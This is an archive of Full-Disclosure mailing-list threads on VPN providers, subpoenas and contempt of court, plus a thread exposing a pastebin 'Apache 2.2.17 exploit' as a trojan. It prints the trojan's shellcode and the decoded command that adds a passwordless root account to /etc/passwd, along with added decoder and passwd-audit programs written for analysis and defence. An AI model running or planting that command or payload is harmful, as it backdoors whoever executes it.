 On 10/3/2011 12:37 PM, Jeffrey Walton wrote:

 On Mon, Oct 3, 2011 at 5:21 PM, Laurelai laure...@oneechan.org wrote:

 On 10/3/2011 12:16 PM, Ferenc Kovacs wrote:

 On Mon, Oct 3, 2011 at 10:35 PM, Laurelai laure...@oneechan.org wrote:

 On 10/3/2011 10:42 AM, Antony widmal wrote:

 Using an external VPN provider to cover your trace clearly shows your
 incompetency and your idiot assumption.
 Trying to blame the VPN provider rather than accepting your mistake
 and learning from it clearly show your 3 years old mentality.

 Also, could you please stop posting as GLOW Xd as well ?
 We do not need your schizophrenic script kiddie lolololol, xD,
 hugs,  spamming on this mailing list.

 You being on this mailing list is once again not the best idea.

 Thanks,
 Antony

 Actually XD and me are two different people. Second issues of privacy
 are always relevant, not understanding that law abiding individuals
 should always be concerned about companies that hand over personal info
 at the request of an authority figure are the ones with three year old
 mentalities.

 maybe they are law abiding companies? :)
 this whole fuss wouldn't have happened, if everybody could just stay a
 law abiding citizen.

 The idea that if you've done nothing wrong, you have nothing to worry
 about assumes that the government is full of good people that would not
 abuse their power, ever. Even if this were true now, we cannot be sure it'll
 be true in the future and it's damn sure not true now.

 Definitely not true in the past. Confer: Martin Luther King was
 subjected to tens of thousands of illegal wire taps by the FBI because
 he (and a lot of other people) felt black folks should get the same
 rights as white folks.

 The guy who did it was honored in death, and the bureau he helped
 shape actually carries fidelity and integrity in their motto.
 Twisted but true.

 Jeff

 I am glad there are people here who understand the need for real privacy in
 the modern age.

 The US Government has proven *repeatedly* that the more power it has the
 less trustworthy it is especially when it comes to privacy concerns.

The threat model should include government and corporate:
http://lists.randombit.net/pipermail/cryptography/2011-September/001474.html

Why is a third party (CAs) involved when a pre-existing relationship exists:
http://lists.randombit.net/pipermail/cryptography/2011-September/001396.html



Re: [Full-disclosure] New open source Security Framework

2011-10-04 Thread Gage Bystrom
Would you kindly die in a fire?



Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread Valdis . Kletnieks
On Wed, 05 Oct 2011 08:55:07 +1100, xD 0x41 said:

 could be used a very handy 'bind' shell tho...

I swear, bind shell code is like Our Friend The Beaver school essay
assignments - everybody ends up writing one, they all look the same, and almost
none are any good. ;)




Re: [Full-disclosure] New open source Security Framework

2011-10-04 Thread Valdis . Kletnieks
On Tue, 04 Oct 2011 20:01:26 EDT, Travis Biehn said:

 XML Modules? In *my* exploit pack?

XML - the kudzu of the internet.




Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread Valdis . Kletnieks
On Tue, 04 Oct 2011 03:15:02 EDT, Jeffrey Walton said:
 On Tue, Oct 4, 2011 at 3:06 AM, Ferenc Kovacs tyr...@gmail.com wrote:

  As I mentioned before it is hard to expect that a VPN provider will
  risk his company for your $11.52/month, and maybe they would try it
  for some lesser case, but what Lulsec did was grant, so I'm not
  surprised that they bent.
 
 Alleged

Yes. So?  In most jurisdictions, alleged and probable cause is sufficient
to get a court to sign off on a subpoena and/or warrants.

Dear Judge:  On Aug 23, a hacker using the handle JustFellOutOfTree did
violate Section N, Clause X.Y of the criminal code by hacking into
BigStore.com.  The connection was traced back to the provider VPNs-R-Us.  We
would like a court order requesting VPNs-R-Us to provide any and all
information they may have regarding this user.

That will usually do it (after bulked up to about 3 pages with legalese and
dotting the t's and crossing the i's).

The next morning, the manager at VPNs-R-Us gets to his office, and finds
two guys with guns and a signed piece of paper.  At which point one of two
things will happen:

1) the guy rolls and gives up all the info.
2) the guy calls his lawyer and makes sure that he gives up all the required info,
and not one byte more.

(Option 3 - the guy heads downtown on a contempt of court charge - happens so
rarely that it's basically a hypothetical).




Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread xD 0x41
haha very true but, still a very good/easy and, often used as example code,
but, yes most are assignments usually :s and, actually seen as a feature for
some people, who like, tend to forget passes rofl :P


On 5 October 2011 11:53, valdis.kletni...@vt.edu wrote:

 On Wed, 05 Oct 2011 08:55:07 +1100, xD 0x41 said:

  could be used a very handy 'bind' shell tho...

 I swear, bind shell code is like Our Friend The Beaver school essay
 assignments - everybody ends up writing one, they all look the same, and
 almost
 none are any good. ;)



Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread adam
(Option 3 - the guy heads downtown on a contempt of court charge - happens so
rarely that it's basically a hypothetical).

You do realize that (at least in the US) - contempt is *not* a criminal
offense, don't you?


Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread Laurelai

On 10/4/2011 6:35 PM, adam wrote:
(Option 3 - the guy heads downtown on a contempt of court charge - happens so
rarely that it's basically a hypothetical).

You do realize that (at least in the US) - contempt is *not* a 
criminal offense, don't you?


That actually depends on the situation, contempt can be criminal. And 
frankly if you refuse a court order for information like that, the LE 
officers will just seize it by gunpoint legally, then arrest you.

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread adam
That actually depends on the situation, contempt can be criminal. And
frankly if you refuse a court order for information like that, the LE
officers will just seize it by gunpoint legally, then arrest you.

I'm curious as to what you think would cause contempt to be a criminal
offense, especially in that example.

Secondly, without the appropriate warrant - they couldn't legally take
anything. If they disregarded that truth and did so anyway, they'd open
themselves up to a pretty big lawsuit for violating that individual's civil
rights as well as due process. Not to mention, anything found would likely
end up being inadmissible because it was obtained illegally.


Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread Valdis . Kletnieks
On Tue, 04 Oct 2011 20:35:16 CDT, adam said:
 (Option 3 - the guy heads downtown on a contempt of court charge - happens so
 rarely that it's basically a hypothetical).

 You do realize that (at least in the US) - contempt is *not* a criminal
 offense, don't you?

tl;dr: Doesn't matter, you can end up in the slammer anyhow.

Actually, the general rule is that if it's a civil proceeding it's only civil
contempt.  Refusing to comply with warrants or subpoenas pursuant to a criminal
proceeding could very well get you criminal contempt.  And even in civil
proceedings the judge can stick you in jail till you decide to change your
mind.

And we're certainly discussing a criminal proceeding here.

Journalist Judith Miller got to spend 4 months in jail for refusing to cooperate
with a grand jury investigation.  
https://secure.wikimedia.org/wikipedia/en/wiki/Judith_Miller_(journalist)#Contempt_of_court

And this dude spent 14 years in jail on a *civil* contempt charge:
https://secure.wikimedia.org/wikipedia/en/wiki/H._Beatty_Chadwick






Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread adam
the judge can stick you in jail till you decide to change your mind.

That sums up the point entirely. In ALL of those cases, a judge deemed
[whatever] contempt - law enforcement *did not*.


Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread Laurelai

On 10/4/2011 6:50 PM, adam wrote:
That actually depends on the situation, contempt can be criminal. And 
frankly if you refuse a court order for information like that, the LE 
officers will just seize it by gunpoint legally, then arrest you.


I'm curious as to what you think would cause contempt to be a criminal 
offense, especially in that example.


Secondly, without the appropriate warrant - they couldn't legally take 
anything. If they disregarded that truth and did so anyway, they'd 
open themselves up to a pretty big lawsuit for violating that 
individual's civil rights as well as due process. Not to mention, 
anything found would likely end up being inadmissible because it was 
obtained illegally.



http://www.justice.gov/usao/eousa/foia_reading_room/usam/title9/crm00754.htm

And they can hold you indefinitely until you comply, or use your lack of 
compliance as reasonable suspicion to get that warrant, oh and let's not 
forget that they are declaring kids cyber terrorists and then the 
Patriot Act takes effect in cases of suspicion of terrorism, when that 
happens you don't have any rights anymore. Realistically we should stop 
calling them rights since they aren't really rights, they are privileges 
that can be revoked at government convenience.



Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread VeNoMouS
  
char evil[] =
    "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47\x89"
    "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51\x89"
    "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80\xe8"
    "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63\x23"
    "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30\x74"
    "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65\x3a"
    "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"
    "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
    "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44"
    "\x44\x44";
.

execl("/bin/sh", "sh", "-c", evil, 0);

.

/bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd

AHUH.

On Mon, 3 Oct 2011 15:31:29 +0100, Darren Martyn wrote:

 I regularly trawl Pastebin.com to find code - often idiots leave some 0day
 and similar there and it is nice to find.

 Well, seeing as I have no test boxes at the moment, can someone check this
 code in a VM? I am not sure if it is legit or not.

 http://pastebin.com/ygByEV2e

 Thanks :)

 ~Darren

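Added example, not code from the thread or from the pastebin post: a small C
program that recovers the execve() arguments a jmp/call/pop shellcode builds,
without ever executing it, by replaying the NUL stores and the lea
displacements against a writable copy of the blob's data section. The byte
array is the "evil" blob quoted above; the function names and the byte-pattern
scan (tuned to the instruction forms this blob uses, not a general
disassembler) are this example's own assumptions.

```c
/* Added example (not from the thread): statically recover what a
 * jmp/call/pop shellcode passes to execve().  Assumed, not from the
 * original post: all function names, and a byte-pattern scan for the
 * exact forms this blob uses (31 c0 xor eax,eax; 88 46 xx mov [esi+d8],al;
 * 89 76 xx mov [esi+d8],esi; 8d 5e xx lea ebx,[esi+d8]); not a disassembler. */
#include <stdio.h>
#include <string.h>

/* The "evil" blob quoted above, byte for byte. */
static const unsigned char evil[] =
    "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47\x89"
    "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51\x89"
    "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80\xe8"
    "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63\x23"
    "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30\x74"
    "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65\x3a"
    "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"
    "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
    "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44"
    "\x44\x44";
#define EVIL_LEN (sizeof evil - 1)
#define MAX_ARGS 8

/* 'jmp rel8' at offset 0 lands on a 'call rel32'; the 'pop esi' it returns
 * to receives the address of the byte after the call, where the data starts.
 * Returns 0 if the blob does not have that shape. */
static size_t find_data_offset(const unsigned char *sc, size_t len)
{
    if (len < 2 || sc[0] != 0xeb) return 0;
    size_t call_at = 2 + sc[1];
    if (call_at + 5 > len || sc[call_at] != 0xe8) return 0;
    return call_at + 5;
}

/* Replay each 'mov byte [esi+disp8], al' (88 46 xx) executed while AL is
 * zero (set by 31 c0, cleared by b0 xx).  These are the NUL terminators the
 * code writes at run time, which is why the blob has no 0x00 byte of its
 * own.  Returns the number of bytes patched. */
static int apply_null_patches(const unsigned char *code, size_t code_len,
                              unsigned char *data, size_t data_len)
{
    int patched = 0, al_zero = 0;
    for (size_t i = 0; i + 2 < code_len; i++) {
        if (code[i] == 0x31 && code[i + 1] == 0xc0) {
            al_zero = 1;
        } else if (code[i] == 0xb0) {
            al_zero = 0;
        } else if (al_zero && code[i] == 0x88 && code[i + 1] == 0x46) {
            if (code[i + 2] < data_len) { data[code[i + 2]] = 0; patched++; }
            i += 2;
        }
    }
    return patched;
}

/* Rebuild argv as the code does: argv[0] is ESI itself (89 76 xx), each
 * later element is a 'lea ebx,[esi+disp8]' (8d 5e xx) stored into the
 * vector.  argv gets NULL-terminated pointers into buf, a writable copy of
 * the data.  Returns argc, or -1 if the shape is wrong or data won't fit. */
static int recover_execve(const unsigned char *sc, size_t len,
                          unsigned char *buf, size_t buf_len,
                          const char **argv, int max_args)
{
    size_t data_off = find_data_offset(sc, len);
    if (data_off == 0 || data_off >= len) return -1;
    size_t data_len = len - data_off;
    if (data_len + 1 > buf_len) return -1;
    memcpy(buf, sc + data_off, data_len);
    buf[data_len] = 0;                       /* belt-and-braces terminator */
    apply_null_patches(sc, data_off, buf, data_len);

    int argc = 0, have_path = 0;
    for (size_t i = 0; i + 2 < data_off && argc < max_args - 1; i++) {
        if (!have_path && sc[i] == 0x89 && sc[i + 1] == 0x76) {
            argv[argc++] = (const char *)buf;
            have_path = 1;
        } else if (sc[i] == 0x8d && sc[i + 1] == 0x5e && sc[i + 2] < data_len) {
            argv[argc++] = (const char *)buf + sc[i + 2];
        }
    }
    argv[argc] = NULL;
    return argc;
}

/* Wrappers over the blob above so the result can be inspected by name. */
static unsigned char scratch[256];
static const char *evil_argv[MAX_ARGS];

static int evil_argc(void)
{
    return recover_execve(evil, EVIL_LEN, scratch, sizeof scratch,
                          evil_argv, MAX_ARGS);
}

static const char *evil_arg(int i)
{
    int argc = evil_argc();
    return (i >= 0 && i < argc) ? evil_argv[i] : NULL;
}

int main(void)
{
    int argc = evil_argc();
    if (argc < 0) { puts("not a jmp/call/pop blob"); return 1; }
    printf("execve(\"%s\", argv, envp) with:\n", evil_argv[0]);
    for (int i = 0; i < argc; i++) printf("  argv[%d] = \"%s\"\n", i, evil_argv[i]);
    return 0;
}
```

Compile and run as is; argv[2] comes out as the shell command that appends a
UID 0 account to /etc/passwd, and find_data_offset() lands on 0x31, the byte
after the call. The envp the code passes (edx = esi+0x55) points at the dword
it zeroed, i.e. an empty environment. The scan is deliberately narrow: for a
blob using other addressing forms, extend the patterns or use a real
disassembler rather than trusting a silent empty result.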

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread xD 0x41
This is ONCE you are actually in front of the judge...remember, it may take
some breaking of civil liberty for this to happen... or I may be wrong.
cheers
xd


On 5 October 2011 15:10, Laurelai laure...@oneechan.org wrote:

  On 10/4/2011 6:50 PM, adam wrote:

 That actually depends on the situation, contempt can be criminal. And
 frankly if you refuse a court order for information like that, the LE
 officers will just seize it by gunpoint legally, then arrest you.

  I'm curious as to what you think would cause contempt to be a criminal
 offense, especially in that example.

  Secondly, without the appropriate warrant - they couldn't legally take
 anything. If they disregarded that truth and did so anyway, they'd open
 themselves up to a pretty big lawsuit for violating that individual's civil
 rights as well as due process. Not to mention, anything found would likely
 end up being inadmissible because it was obtained illegally.

 On Tue, Oct 4, 2011 at 10:39 PM, Laurelai laure...@oneechan.org wrote:

   On 10/4/2011 6:35 PM, adam wrote:

 (Option 3 - the guy heads downtown on a contempt of court charge -
 happens so
 rarely that it's basically a hypothetical).

  You do realize that (at least in the US) - contempt is *not* a criminal
 offense, don't you?

 On Tue, Oct 4, 2011 at 8:05 PM, valdis.kletni...@vt.edu wrote:

 On Tue, 04 Oct 2011 03:15:02 EDT, Jeffrey Walton said:
  On Tue, Oct 4, 2011 at 3:06 AM, Ferenc Kovacs tyr...@gmail.com
 wrote:

As I mentioned before it is hard to expect that a VPN provider will
   risk his company for your $11.52/month, and maybe they would try it
   for some lesser case, but what Lulsec did was grant, so I'm not
   surprised that they bent.
 
  Alleged

  Yes. So?  In most jurisdictions, alledged and probable cause is
 sufficient
 to get a court to sign off on a subpoena and/or warrants.

  Dear Judge:  On Aug 23, a hacker using the handle JustFellOutOfTree did
  violate Section N, Clause X.Y of the criminal code by hacking into
  BigStore.com.  The connection was traced back to the provider VPNs-R-Us.  We
  would like a court order requesting VPNs-R-Us to provide any and all
  information they may have regarding this user.

  That will usually do it (after bulked up to about 3 pages with legalese and
  dotting the t's and crossing the i's).

 The next morning, the manager at VPNs-R-Us gets to his office, and finds
 two guys with guns and a signed piece of paper.  At which point one of
 two
 things will happen:

 1) the guy rolls and gives up all the info.
 2) the guy calls his lawyer and makes sure that he gives up all the
 required info,
 and not one byte more.

 (Option 3 - the guy heads downtown on a contempt of court charge -
 happens so
 rarely that it's basically a hypothetical).


 ___
 Full-Disclosure - We believe in it.
 Charter: http://lists.grok.org.uk/full-disclosure-charter.html
 Hosted and sponsored by Secunia - http://secunia.com/





   That actually depends on the situation, contempt can be criminal. And
 frankly if you refuse a court order for information like that, the LE
 officers will just seize it by gunpoint legally, then arrest you.




 http://www.justice.gov/usao/eousa/foia_reading_room/usam/title9/crm00754.htm

 And they can hold you indefinitely until you comply, or use your lack of
 compliance as reasonable suspicion to get that warrant. Oh, and let's not
 forget that they are declaring kids cyber terrorists, and then the Patriot
 Act takes effect in cases of suspicion of terrorism; when that happens you
 don't have any rights anymore. Realistically we should stop calling them
 rights, since they aren't really rights; they are privileges that can be
 revoked at government convenience.



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread xD 0x41
yer it is clarly leet stuff dude...
i ran it and got liek 2000k2.2.* apache user bot  in a night! :P
hgehe (jkin)
funny tho.
xd


On 5 October 2011 13:09, VeNoMouS ve...@gen-x.co.nz wrote:

 char evil[] =
 "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47\x89"
 "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51\x89"
 "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80\xe8"
 "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63\x23"
 "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30\x74"
 "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65\x3a"
 "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"
 "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
 "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44"
 "\x44\x44";
 .
 execl("/bin/sh", "sh", "-c", evil, 0);

 .



 /bin/echo w000t::0:0:s4fem0de:/root:/bin/bash >> /etc/passwd

 AHUH.



 On Mon, 3 Oct 2011 15:31:29 +0100, Darren Martyn wrote:

 I regularly trawl Pastebin.com to find code - often idiots leave some 0day
 and similar there and it is nice to find.

 Well, seeing as I have no test boxes at the moment, can someone check this
 code in a VM? I am not sure if it is legit or not.

 http://pastebin.com/ygByEV2e

 Thanks :)

 ~Darren






___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
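The payload VeNoMouS decoded above can be checked without ever running it, which is the check Darren's "can someone test this in a VM" request was really asking for. The following is an added example, not code from the pastebin or from anyone in the thread. Only the byte string is taken from the posted char evil[] array; the function names and the approach are the example's own. It splits the blob at the backwards call of the jmp/call/pop idiom, applies the three `mov byte [esi+N], al` stores that the code uses as run-time NUL terminators, and reports the strings handed to the syscall and the syscall number loaded into al.

```python
"""Static triage of a jmp/call/pop shellcode blob without executing it.

Added example for the 'Apache 2.2.17 exploit?' thread; not code from the
pastebin or from anyone in the thread. EVIL is the byte string from the
posted C array. decode_strings() recovers the strings the payload passes
to the kernel and execve_syscall_number() recovers the syscall, which is
enough to see that the 'exploit' only appends a UID-0 account to
/etc/passwd on the machine that runs it.
"""
from __future__ import annotations

# Byte string from the posted char evil[] array (page data, not constructed).
EVIL = (
    b"\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47\x89"
    b"\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51\x89"
    b"\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80\xe8"
    b"\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63\x23"
    b"\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30\x74"
    b"\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65\x3a"
    b"\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"
    b"\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
    b"\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44"
    b"\x44\x44"
)


def split_code_and_data(blob: bytes) -> tuple[bytes, bytes]:
    """Split a jmp/call/pop payload at its backwards 'call rel32' (opcode 0xe8).

    In this idiom the data block (strings, then pointer scratch space) sits
    directly after the call that jumps back to 'pop esi', so that call is the
    last instruction and everything after it is data. The blob is assumed to
    follow the idiom; anything else is rejected rather than guessed at.
    """
    i = blob.rfind(b"\xe8")
    if i < 0 or i + 5 > len(blob):
        raise ValueError("no call rel32 found")
    rel = int.from_bytes(blob[i + 1:i + 5], "little", signed=True)
    if rel >= 0:
        raise ValueError("call is not backwards; not the jmp/call/pop idiom")
    return blob[:i + 5], blob[i + 5:]


def nul_patch_offsets(code: bytes) -> list[int]:
    """Offsets written by 'mov byte [esi+disp8], al' (encoding 88 46 disp8).

    After 'xor eax, eax' (31 c0) al is zero, so each such store turns a
    placeholder byte in the data block into a NUL terminator at run time.
    """
    return [code[i + 2] for i in range(len(code) - 2) if code[i:i + 2] == b"\x88\x46"]


def execve_syscall_number(code: bytes) -> int | None:
    """Return the imm8 of the last 'mov al, imm8' (b0 XX) before 'int 0x80' (cd 80)."""
    trap = code.find(b"\xcd\x80")
    if trap < 0:
        return None
    mov_al = code.rfind(b"\xb0", 0, trap)
    return code[mov_al + 1] if mov_al >= 0 else None


def decode_strings(blob: bytes) -> list[str]:
    """Apply the run-time NUL patches and return the NUL-separated segments.

    The final segment is the AAAA/BBBB/CCCC/DDDD filler that the code
    overwrites with argv pointers and a NULL; it is returned so the reader
    can see it, but the shell never receives it as a string.
    """
    code, data = split_code_and_data(blob)
    buf = bytearray(data)
    for off in nul_patch_offsets(code):
        if off < len(buf):
            buf[off] = 0
    return [seg.decode("latin-1") for seg in bytes(buf).split(b"\x00")]


if __name__ == "__main__":
    segments = decode_strings(EVIL)
    nr = execve_syscall_number(EVIL)
    print(f"int 0x80 with eax={nr} ({'execve' if nr == 11 else 'unknown'} on 32-bit Linux)")
    for idx, seg in enumerate(segments[:-1]):
        print(f"argv[{idx}] = {seg!r}")
    print(f"pointer scratch area: {segments[-1]!r}")
```

The 16 filler bytes are not a string the shell sees: the `mov [esi+0x49], esi`, `mov [esi+0x4d], ebx`, `mov [esi+0x51], ebx` and `mov [esi+0x55], eax` stores in the code overwrite them with the three argv pointers and a terminating NULL before `int 0x80`, and `lea edx, [esi+0x55]` reuses that NULL as envp. A blob posted as an Apache exploit whose only syscall is execve of `/bin/sh -c` against the local `/etc/passwd` is a trojan aimed at whoever compiles and runs it, not at any remote server.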

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread adam

http://www.justice.gov/usao/eousa/foia_reading_room/usam/title9/crm00754.htm

Did you actually read the link you pasted?

[...] and criminal penalties *may not be imposed on someone who has not
been afforded the protections* that the Constitution requires of such
criminal proceedings [...] protections include the right [..]

Then take a look at the actual rights being referenced. Most of which *would
be violated* as a result.

In response to 0x41: "This is ONCE you are actually in front, of the
judge...remember, it may take some breaking of civil liberty, for this to
happen..."

No, you're absolutely right. That's the point here. Contempt is attached to
the previous court order, there wouldn't be a new judge/new case for the
contempt charge alone. All of it is circumstantial anyway, especially due to
how much power judges actually have (in both criminal AND civil
proceedings).
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] Apache 2.2.17 exploit?

2011-10-04 Thread adam
Wow, I'm extremely impressed with the support that the developer of this
exploit offers. I had been trying to get the exploit to work for about an
hour or so (couldn't get root on the target) and noticed that the developer
of this exploit logged into my machine (using an old account I must have set
up a while ago named w000t). I couldn't believe it when I saw that he was
logging in to fix the problem, I've NEVER gotten that kind of support even
out of paid software. He's been logged in for a couple of hours now, and
I've noticed that he's downloaded/uploaded quite a bit (probably downloading
the log files and then uploading patches) so I'm just gonna wait it out. I
definitely have a good feeling about this though.

On Tue, Oct 4, 2011 at 9:21 PM, xD 0x41 sec...@gmail.com wrote:

 yer it is clarly leet stuff dude...
 i ran it and got liek 2000k2.2.* apache user bot  in a night!
 :P
 hgehe (jkin)
 funny tho.
 xd



___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
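adam's joke above points at the real check: on any box where this "exploit" was compiled and run, /etc/passwd now carries a second UID-0 entry with an empty password field. The following is an added example, not code from anyone in the thread, that audits passwd-format data for exactly that and for the related signs (a UID shared with root, malformed entries). The sample entries are constructed; the last one is the line the decoded payload appends. Point read_and_audit() at a real file to run it on a host.

```python
"""Audit /etc/passwd-style data for the kind of account the posted payload adds.

Added example for the 'Apache 2.2.17 exploit?' thread; not code from anyone
in it. PASSWD_SAMPLE is constructed: three ordinary entries plus the exact
line the decoded payload appends. audit_passwd() flags UID-0 accounts other
than root, empty password fields (no password set at all; the field is not
'x', so nothing is deferred to /etc/shadow), duplicate UIDs and malformed
entries.
"""
from __future__ import annotations

# Constructed sample; the last line is what the decoded payload writes.
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
w000t::0:0:s4fem0de:/root:/bin/bash
"""


def audit_passwd(text: str) -> list[tuple[int, str, str]]:
    """Return (line number, account name, finding) triples for suspicious entries."""
    findings: list[tuple[int, str, str]] = []
    uid_owner: dict[str, str] = {}  # first account seen for each numeric uid
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((lineno, fields[0], "malformed entry (expected 7 fields)"))
            continue
        name, passwd, uid, _gid, _gecos, _home, _shell = fields
        if not uid.isdigit():
            findings.append((lineno, name, f"non-numeric uid {uid!r}"))
            continue
        if uid == "0" and name != "root":
            findings.append((lineno, name, "uid 0 account other than root"))
        if passwd == "":
            # Whether a login with no password is then accepted depends on
            # PAM (pam_unix 'nullok'), but the account has no secret at all.
            findings.append((lineno, name, "empty password field: no password set"))
        if uid in uid_owner and uid_owner[uid] != name:
            findings.append((lineno, name, f"shares uid {uid} with {uid_owner[uid]}"))
        uid_owner.setdefault(uid, name)
    return findings


def read_and_audit(path: str = "/etc/passwd") -> list[tuple[int, str, str]]:
    """Audit a passwd file on disk; the default is the live system file."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return audit_passwd(fh.read())


if __name__ == "__main__":
    for lineno, name, finding in audit_passwd(PASSWD_SAMPLE):
        print(f"line {lineno}: {name}: {finding}")
```

On the constructed sample the w000t line produces three findings (UID 0 under a name other than root, an empty password field, and a UID shared with root); the three ordinary entries produce none. Removing the line is the fix, but a host where it appeared also ran an attacker-supplied binary as root and should be treated as compromised, not just cleaned.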

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread adam
It's frightening how much power judges have, and how poorly they
are overseen.

Definitely agree there. Some of the civil cases are disgustingly bad, due to
there being no media attention and no real oversight. The civil case
mentioned above is a good example, and all of the excessive child support
orders even further that.

On topic: I haven't read every single reply here, but from what I've seen:
no one has mentioned the VPN provider being held personally responsible.
Being that the attacks originated from machines they own, if they failed to
turn over user information, could it really be that difficult to pin the
attacks on them and convince a judge that they were responsible?

On Tue, Oct 4, 2011 at 9:37 PM, Jeffrey Walton noloa...@gmail.com wrote:

 On Tue, Oct 4, 2011 at 10:32 PM, adam a...@papsy.net wrote:
 
 http://www.justice.gov/usao/eousa/foia_reading_room/usam/title9/crm00754.htm
  Did you actually read the link you pasted?
  [...] and criminal penalties may not be imposed on someone who has not
 been
  afforded the protections that the Constitution requires of such criminal
  proceedings [...] protections include the right [..]
  Then take a look at the actual rights being referenced. Most of which
 would
  be violated as a result.
  In response to 0x41 This is ONCE you are actually in front, of the
  judge...remember, it may take some breaking of civil liberty, for this to
  happen... 
  No, you're absolutely right. That's the point here. Contempt is attached
 to
  the previous court order, there wouldn't be a new judge/new case for the
  contempt charge alone. All of it is circumstantial anyway, especially due
 to
  how much power judges actually have (in both criminal AND civil
  proceedings).
 It's frightening how much power judges have, and how poorly they are
 overseen. Confer: Judge James Ware, US 9th Circuit Court (this is not
 a local judge in a hillbilly town).

 Jeff

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Re: [Full-disclosure] VPN providers and any providers in general...

2011-10-04 Thread Laurelai
On 10/4/2011 7:50 PM, Jeffrey Walton wrote:
 On Tue, Oct 4, 2011 at 10:19 PM, xD 0x41sec...@gmail.com  wrote:
 This is ONCE you are actually in front, of the judge...remember, it may take
 some breaking of civil liberty, for this to happen... or i maybe wrong.
 cheers
 Yep. Though some are probably not nice people, the Guantanamo Bay
 detainees were denied US Constitutional Rights (so said the US Supreme
 Court, 3 times).

 The folks who perverted our highest laws and precepts were not brought
 up on charges, or even censored. Sparta had it right: put the
